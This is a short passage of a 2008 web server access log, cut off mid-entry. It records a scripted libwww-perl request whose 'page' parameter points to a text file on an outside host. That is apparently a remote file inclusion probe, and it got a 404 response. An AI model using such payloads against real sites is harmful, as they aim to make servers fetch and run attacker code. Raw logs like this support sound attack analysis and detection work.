80.93.56.181 - - [01/Apr/2008:09:57:15 -0700] "GET //atom.php5?page=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:09:57:16 -0700] "GET /logs